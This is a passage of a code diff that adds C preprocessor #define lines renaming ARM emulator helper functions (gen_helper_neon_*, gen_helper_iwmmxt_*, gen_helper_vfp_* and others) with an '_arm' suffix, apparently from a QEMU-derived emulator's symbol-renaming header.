gen_arm_shift_reg gen_arm_shift_reg_arm +#define gen_bx gen_bx_arm +#define gen_bx_im gen_bx_im_arm +#define gen_clrex gen_clrex_arm +#define generate_memory_topology generate_memory_topology_arm +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_arm +#define gen_exception 
gen_exception_arm +#define gen_exception_insn gen_exception_insn_arm +#define gen_exception_internal gen_exception_internal_arm +#define gen_exception_internal_insn gen_exception_internal_insn_arm +#define gen_exception_return gen_exception_return_arm +#define gen_goto_tb gen_goto_tb_arm +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_arm +#define gen_helper_add_saturate gen_helper_add_saturate_arm +#define gen_helper_add_setq gen_helper_add_setq_arm +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_arm +#define gen_helper_clz32 gen_helper_clz32_arm +#define gen_helper_clz64 gen_helper_clz64_arm +#define gen_helper_clz_arm gen_helper_clz_arm_arm +#define gen_helper_cpsr_read gen_helper_cpsr_read_arm +#define gen_helper_cpsr_write gen_helper_cpsr_write_arm +#define gen_helper_crc32_arm gen_helper_crc32_arm_arm +#define gen_helper_crc32c gen_helper_crc32c_arm +#define gen_helper_crypto_aese gen_helper_crypto_aese_arm +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_arm +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_arm +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_arm +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_arm +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_arm +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_arm +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_arm +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_arm +#define gen_helper_double_saturate gen_helper_double_saturate_arm +#define gen_helper_exception_internal gen_helper_exception_internal_arm +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_arm +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_arm +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_arm +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_arm +#define gen_helper_get_user_reg gen_helper_get_user_reg_arm +#define gen_helper_iwmmxt_addcb 
gen_helper_iwmmxt_addcb_arm +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_arm +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_arm +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_arm +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_arm +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_arm +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_arm +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_arm +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_arm +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_arm +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_arm +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_arm +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_arm +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_arm +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_arm +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_arm +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_arm +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_arm +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_arm +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_arm +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_arm +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_arm +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_arm +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_arm +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_arm +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_arm +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_arm +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_arm +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_arm +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_arm +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_arm +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_arm +#define gen_helper_iwmmxt_maddsq 
gen_helper_iwmmxt_maddsq_arm +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_arm +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_arm +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_arm +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_arm +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_arm +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_arm +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_arm +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_arm +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_arm +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_arm +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_arm +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_arm +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_arm +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_arm +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_arm +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_arm +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_arm +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_arm +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_arm +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_arm +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_arm +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_arm +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_arm +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_arm +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_arm +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_arm +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_arm +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_arm +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_arm +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_arm +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_arm +#define gen_helper_iwmmxt_rorw 
gen_helper_iwmmxt_rorw_arm +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_arm +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_arm +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_arm +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_arm +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_arm +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_arm +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_arm +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_arm +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_arm +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_arm +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_arm +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_arm +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_arm +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_arm +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_arm +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_arm +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_arm +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_arm +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_arm +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_arm +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_arm +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_arm +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_arm +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_arm +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_arm +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_arm +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_arm +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_arm +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_arm +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_arm +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_arm +#define 
gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_arm +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_arm +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_arm +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_arm +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_arm +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_arm +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_arm +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_arm +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_arm +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_arm +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_arm +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_arm +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_arm +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_arm +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_arm +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_arm +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_arm +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_arm +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_arm +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_arm +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_arm +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_arm +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_arm +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_arm +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_arm +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_arm +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_arm +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_arm +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_arm +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_arm +#define gen_helper_neon_add_u16 
gen_helper_neon_add_u16_arm +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_arm +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_arm +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_arm +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_arm +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_arm +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_arm +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_arm +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_arm +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_arm +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_arm +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_arm +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_arm +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_arm +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_arm +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_arm +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_arm +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_arm +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_arm +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_arm +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_arm +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_arm +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_arm +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_arm +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_arm +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_arm +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_arm +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_arm +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_arm +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_arm +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_arm +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_arm +#define gen_helper_neon_hadd_u32 
gen_helper_neon_hadd_u32_arm +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_arm +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_arm +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_arm +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_arm +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_arm +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_arm +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_arm +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_arm +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_arm +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_arm +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_arm +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_arm +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_arm +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_arm +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_arm +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_arm +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_arm +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_arm +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_arm +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_arm +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_arm +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_arm +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_arm +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_arm +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_arm +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_arm +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_arm +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_arm +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_arm +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_arm +#define gen_helper_neon_narrow_round_high_u8 
gen_helper_neon_narrow_round_high_u8_arm +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_arm +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_arm +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_arm +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_arm +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_arm +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_arm +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_arm +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_arm +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_arm +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_arm +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_arm +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_arm +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_arm +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_arm +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_arm +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_arm +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_arm +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_arm +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_arm +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_arm +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_arm +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_arm +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_arm +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_arm +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_arm +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_arm +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_arm +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_arm +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_arm +#define gen_helper_neon_qadd_s64 
gen_helper_neon_qadd_s64_arm +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_arm +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_arm +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_arm +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_arm +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_arm +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_arm +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_arm +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_arm +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_arm +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_arm +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_arm +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_arm +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_arm +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_arm +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_arm +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_arm +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_arm +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_arm +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_arm +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_arm +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_arm +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_arm +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_arm +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_arm +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_arm +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_arm +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_arm +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_arm +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_arm +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_arm +#define gen_helper_neon_qshlu_s64 
gen_helper_neon_qshlu_s64_arm +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_arm +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_arm +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_arm +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_arm +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_arm +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_arm +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_arm +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_arm +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_arm +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_arm +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_arm +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_arm +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_arm +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_arm +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_arm +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_arm +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_arm +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_arm +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_arm +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_arm +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_arm +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_arm +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_arm +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_arm +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_arm +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_arm +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_arm +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_arm +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_arm +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_arm +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_arm +#define gen_helper_neon_shl_s64 
gen_helper_neon_shl_s64_arm +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_arm +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_arm +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_arm +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_arm +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_arm +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_arm +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_arm +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_arm +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_arm +#define gen_helper_neon_tbl gen_helper_neon_tbl_arm +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_arm +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_arm +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_arm +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_arm +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_arm +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_arm +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_arm +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_arm +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_arm +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_arm +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_arm +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_arm +#define gen_helper_neon_zip16 gen_helper_neon_zip16_arm +#define gen_helper_neon_zip8 gen_helper_neon_zip8_arm +#define gen_helper_pre_hvc gen_helper_pre_hvc_arm +#define gen_helper_pre_smc gen_helper_pre_smc_arm +#define gen_helper_qadd16 gen_helper_qadd16_arm +#define gen_helper_qadd8 gen_helper_qadd8_arm +#define gen_helper_qaddsubx gen_helper_qaddsubx_arm +#define gen_helper_qsub16 gen_helper_qsub16_arm +#define gen_helper_qsub8 gen_helper_qsub8_arm +#define gen_helper_qsubaddx gen_helper_qsubaddx_arm +#define gen_helper_rbit gen_helper_rbit_arm +#define gen_helper_recpe_f32 
gen_helper_recpe_f32_arm +#define gen_helper_recpe_u32 gen_helper_recpe_u32_arm +#define gen_helper_recps_f32 gen_helper_recps_f32_arm +#define gen_helper_rintd gen_helper_rintd_arm +#define gen_helper_rintd_exact gen_helper_rintd_exact_arm +#define gen_helper_rints gen_helper_rints_arm +#define gen_helper_rints_exact gen_helper_rints_exact_arm +#define gen_helper_ror_cc gen_helper_ror_cc_arm +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_arm +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_arm +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_arm +#define gen_helper_sadd16 gen_helper_sadd16_arm +#define gen_helper_sadd8 gen_helper_sadd8_arm +#define gen_helper_saddsubx gen_helper_saddsubx_arm +#define gen_helper_sar_cc gen_helper_sar_cc_arm +#define gen_helper_sdiv gen_helper_sdiv_arm +#define gen_helper_sel_flags gen_helper_sel_flags_arm +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_arm +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_arm +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_arm +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_arm +#define gen_helper_set_rmode gen_helper_set_rmode_arm +#define gen_helper_set_user_reg gen_helper_set_user_reg_arm +#define gen_helper_shadd16 gen_helper_shadd16_arm +#define gen_helper_shadd8 gen_helper_shadd8_arm +#define gen_helper_shaddsubx gen_helper_shaddsubx_arm +#define gen_helper_shl_cc gen_helper_shl_cc_arm +#define gen_helper_shr_cc gen_helper_shr_cc_arm +#define gen_helper_shsub16 gen_helper_shsub16_arm +#define gen_helper_shsub8 gen_helper_shsub8_arm +#define gen_helper_shsubaddx gen_helper_shsubaddx_arm +#define gen_helper_ssat gen_helper_ssat_arm +#define gen_helper_ssat16 gen_helper_ssat16_arm +#define gen_helper_ssub16 gen_helper_ssub16_arm +#define gen_helper_ssub8 gen_helper_ssub8_arm +#define gen_helper_ssubaddx gen_helper_ssubaddx_arm +#define gen_helper_sub_saturate gen_helper_sub_saturate_arm +#define gen_helper_sxtb16 gen_helper_sxtb16_arm +#define 
gen_helper_uadd16 gen_helper_uadd16_arm +#define gen_helper_uadd8 gen_helper_uadd8_arm +#define gen_helper_uaddsubx gen_helper_uaddsubx_arm +#define gen_helper_udiv gen_helper_udiv_arm +#define gen_helper_uhadd16 gen_helper_uhadd16_arm +#define gen_helper_uhadd8 gen_helper_uhadd8_arm +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_arm +#define gen_helper_uhsub16 gen_helper_uhsub16_arm +#define gen_helper_uhsub8 gen_helper_uhsub8_arm +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_arm +#define gen_helper_uqadd16 gen_helper_uqadd16_arm +#define gen_helper_uqadd8 gen_helper_uqadd8_arm +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_arm +#define gen_helper_uqsub16 gen_helper_uqsub16_arm +#define gen_helper_uqsub8 gen_helper_uqsub8_arm +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_arm +#define gen_helper_usad8 gen_helper_usad8_arm +#define gen_helper_usat gen_helper_usat_arm +#define gen_helper_usat16 gen_helper_usat16_arm +#define gen_helper_usub16 gen_helper_usub16_arm +#define gen_helper_usub8 gen_helper_usub8_arm +#define gen_helper_usubaddx gen_helper_usubaddx_arm +#define gen_helper_uxtb16 gen_helper_uxtb16_arm +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_arm +#define gen_helper_v7m_msr gen_helper_v7m_msr_arm +#define gen_helper_vfp_absd gen_helper_vfp_absd_arm +#define gen_helper_vfp_abss gen_helper_vfp_abss_arm +#define gen_helper_vfp_addd gen_helper_vfp_addd_arm +#define gen_helper_vfp_adds gen_helper_vfp_adds_arm +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_arm +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_arm +#define 